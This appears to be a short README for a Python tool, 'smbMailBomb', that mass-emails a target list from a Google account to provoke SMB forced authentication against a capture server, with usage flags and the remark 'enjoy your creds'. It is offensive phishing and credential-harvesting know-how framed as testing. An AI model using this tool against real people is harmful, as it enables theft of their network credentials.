A command line utility to test for SMB Forced Authentication
Ensure SMB ports 139 and 445 are open on your captuer server
Configure Google to allow the script:
In the Google Admin Panel:
In the google account settings
From the command line run smbMailBomb.py and enjoy your creds:
Usage: python3 smbMailBomb2.py -e user@yourGoogleDomain.com -p yourGooglePassword -f path/to/targets.xlsx -ip captureServerIP
-f path to target xlsx file
-e your google business email
-ip your capture server IP
pip install -r requirments.txt
Add your targets first name and email, following the template provided.